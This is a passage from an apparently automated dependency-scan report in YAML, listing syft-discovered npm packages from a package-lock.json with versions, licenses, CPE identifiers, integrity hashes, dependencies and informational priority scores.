js-cookie: ^3.0.5
nopt: ^7.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cb31e7fb1004281e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: js-cookie 3.0.5'
title: js-cookie 3.0.5
description: 'Package discovered: js-cookie 3.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 07274f4b8a4d661e
name: js-cookie
version: 3.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:js-cookie:js-cookie:3.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js-cookie:js_cookie:3.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_cookie:js-cookie:3.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_cookie:js_cookie:3.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js-cookie:3.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js_cookie:3.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/js-cookie@3.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz
integrity: sha512-cEiJEAEoIbWfCZYKWhVwFuvPX1gETRYPw6LlaTKoxD3s2AkXzkCjnp6h0V77ozyqj0jakteJ4YqDJT830+lVGw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4db17fad932f2d8e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: js-md5 0.8.3'
title: js-md5 0.8.3
description: 'Package discovered: js-md5 0.8.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d30adc61a99cb3ed
name: js-md5
version: 0.8.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:js-md5:js-md5:0.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js-md5:js_md5:0.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_md5:js-md5:0.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_md5:js_md5:0.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js-md5:0.8.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js_md5:0.8.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/js-md5@0.8.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/js-md5/-/js-md5-0.8.3.tgz
integrity: sha512-qR0HB5uP6wCuRMrWPTrkMaev7MJZwJuuw4fnwAzRgP4J4/F8RwtodOKpGp4XpqsLBFzzgqIO42efFAyz2Et6KQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 88f0214bae1b08f0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: js-tokens 4.0.0'
title: js-tokens 4.0.0
description: 'Package discovered: js-tokens 4.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 132a500346fcea0c
name: js-tokens
version: 4.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:js-tokens:js-tokens:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js-tokens:js_tokens:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_tokens:js-tokens:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js_tokens:js_tokens:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js-tokens:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:js:js_tokens:4.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/js-tokens@4.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz
integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d7056e806f2cd1e3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: json-bigint 1.0.0'
title: json-bigint 1.0.0
description: 'Package discovered: json-bigint 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f29c1976ad3d8cb0
name: json-bigint
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:json-bigint_project:json-bigint:1.0.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/json-bigint@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz
integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==
dependencies:
bignumber.js: ^9.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2a5374383b13cd28
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jsonwebtoken 9.0.3'
title: jsonwebtoken 9.0.3
description: 'Package discovered: jsonwebtoken 9.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2ebcc52db7d200cb
name: jsonwebtoken
version: 9.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/jsonwebtoken@9.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz
integrity: sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==
dependencies:
jws: ^4.0.1
lodash.includes: ^4.3.0
lodash.isboolean: ^3.0.3
lodash.isinteger: ^4.0.4
lodash.isnumber: ^3.0.3
lodash.isplainobject: ^4.0.6
lodash.isstring: ^4.0.1
lodash.once: ^4.0.0
ms: ^2.1.1
semver: ^7.5.4
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 835e252fefb47867
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jwa 2.0.1'
title: jwa 2.0.1
description: 'Package discovered: jwa 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 154697ca4fb19b8b
name: jwa
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/jwa@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz
integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==
dependencies:
buffer-equal-constant-time: ^1.0.1
ecdsa-sig-formatter: 1.0.11
safe-buffer: ^5.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0c0a903cc4471d02
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jwks-rsa 3.2.2'
title: jwks-rsa 3.2.2
description: 'Package discovered: jwks-rsa 3.2.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 014369d0efdc09b2
name: jwks-rsa
version: 3.2.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/jwks-rsa@3.2.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz
integrity: sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w==
dependencies:
'@types/jsonwebtoken': ^9.0.4
debug: ^4.3.4
jose: ^4.15.4
limiter: ^1.1.5
lru-memoizer: ^2.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5dd04dd82934e4bc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: jws 4.0.1'
title: jws 4.0.1
description: 'Package discovered: jws 4.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7fed8e7a1bc916bb
name: jws
version: 4.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/jws@4.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/jws/-/jws-4.0.1.tgz
integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==
dependencies:
jwa: ^2.0.1
safe-buffer: ^5.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fdd5e753a1967298
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: leac 0.6.0'
title: leac 0.6.0
description: 'Package discovered: leac 0.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9ec1624bf944fe34
name: leac
version: 0.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/leac@0.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/leac/-/leac-0.6.0.tgz
integrity: sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 63788a24cb56472a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lilconfig 3.1.3'
title: lilconfig 3.1.3
description: 'Package discovered: lilconfig 3.1.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a8f0bd77b399e569
name: lilconfig
version: 3.1.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lilconfig@3.1.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz
integrity: sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 90dd10f1ec21efdc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: limiter 1.1.5'
title: limiter 1.1.5
description: 'Package discovered: limiter 1.1.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7ebb3add1191948c
name: limiter
version: 1.1.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/limiter@1.1.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz
integrity: sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8108350690a84b91
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: linebreak 1.1.0'
title: linebreak 1.1.0
description: 'Package discovered: linebreak 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 17b9850959841637
name: linebreak
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/linebreak@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz
integrity: sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ==
dependencies:
base64-js: 0.0.8
unicode-trie: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6d22d8e100269548
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lines-and-columns 1.2.4'
title: lines-and-columns 1.2.4
description: 'Package discovered: lines-and-columns 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2f4d4f332c0f6687
name: lines-and-columns
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lines-and-columns@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz
integrity: sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 99a30188145ce555
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: locate-path 5.0.0'
title: locate-path 5.0.0
description: 'Package discovered: locate-path 5.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e6b383b17df8c845
name: locate-path
version: 5.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/locate-path@5.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz
integrity: sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==
dependencies:
p-locate: ^4.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4752919bcee27237
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash 4.18.1'
title: lodash 4.18.1
description: 'Package discovered: lodash 4.18.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ac9c211256bf6980
name: lodash
version: 4.18.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/lodash@4.18.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz
integrity: sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 89713df98a2beb75
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.camelcase 4.3.0'
title: lodash.camelcase 4.3.0
description: 'Package discovered: lodash.camelcase 4.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a5b985768ef9b9f6
name: lodash.camelcase
version: 4.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.camelcase@4.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz
integrity: sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4b1d67018d50050d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.clonedeep 4.5.0'
title: lodash.clonedeep 4.5.0
description: 'Package discovered: lodash.clonedeep 4.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1fdd3c59e36d5b0f
name: lodash.clonedeep
version: 4.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
